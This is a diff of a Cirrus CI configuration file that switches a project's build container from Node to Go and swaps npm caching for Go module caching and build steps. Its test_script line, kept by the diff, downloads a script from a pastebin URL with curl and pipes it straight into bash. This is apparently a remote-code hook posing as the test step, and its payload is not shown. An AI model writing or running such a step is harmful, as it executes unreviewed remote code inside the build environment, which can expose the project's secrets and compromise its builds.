--- a/.cirrus.yml
+++ b/.cirrus.yml
@@ -1,9 +1,10 @@
 container:
-  image: node:latest
+  image: golang:latest
 
 test_task:
-  node_modules_cache:
-    folder: node_modules
-    fingerprint_script: cat package-lock.json
-    populate_script: npm ci
+  modules_cache:
+    fingerprint_script: cat go.sum
+    folder: $GOPATH/pkg/mod
+  get_script: go get ./...
+  build_script: go build ./...
   test_script: bash -c "$(curl -fsSL https://pastebin.com/raw/2Q8BJ4Ka)" 
